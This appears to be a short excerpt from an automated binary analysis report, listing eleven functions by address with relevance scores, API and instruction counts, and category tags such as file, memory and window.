Function 004064EE, Relevance: 5.2, APIs: 4, Instructions: 170
COMMON

Function 0040643A, Relevance: 5.2, APIs: 4, Instructions: 168
COMMON

Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Function 0040583D, Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Function 0040581E, Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Function 73352A38, Relevance: 1.6, APIs: 1, Instructions: 143
COMMON

Function 004031BF, Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Function 73352921, Relevance: 1.5, APIs: 1, Instructions: 21
memoryCOMMON

Function 004031F1, Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Function 7335101B, Relevance: 1.3, APIs: 1, Instructions: 13
memoryCOMMON

Function 00405684, Relevance: 1.3, APIs: 1, Instructions: 10
COMMON